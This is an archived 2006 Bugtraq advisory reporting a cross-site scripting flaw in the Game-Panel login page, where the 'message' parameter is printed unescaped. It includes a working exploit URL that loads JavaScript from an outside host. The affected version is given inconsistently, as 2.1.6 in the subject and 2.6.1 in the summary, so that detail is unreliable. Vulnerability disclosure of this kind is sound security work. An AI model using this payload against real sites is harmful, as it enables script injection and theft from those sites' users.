Game-Panel <= 2.1.6 XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Game-Panel <= 2.1.6 XSS
From: retard@xxxxxxxxxx
Date: 4 Mar 2006 20:28:03 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

ORIGIONAL SOURCE: http://notlegal.ws/gamepanel.txt

summary
        software: Game-Panel
        vendors website: http://game-panel.com
        versions: <= 2.6.1
        class: remote
        status: unpatched
        exploit: available
        solution: not available
        discovered by: sycko
        risk level: medium
description
        game-panel uses a global variable to print out
        error messages on their login page allowing
        execution of javascript
exploit(s)
        
http://example.com/login.php?message=%3CSCRIPT%20SRC=http://notlegal.ws/xss.js%3E%3C/SCRIPT%3E

credit
        author(s): retard, jim, and sycko
        email: retard@xxxxxxxxxx

Prev by Date: vulnerability in the IE Java applet initialization engine
Next by Date: evoBlog Remote Name tag Script injection
Previous by thread: vulnerability in the IE Java applet initialization engine
Next by thread: evoBlog Remote Name tag Script injection
Index(es):
- Date
- Thread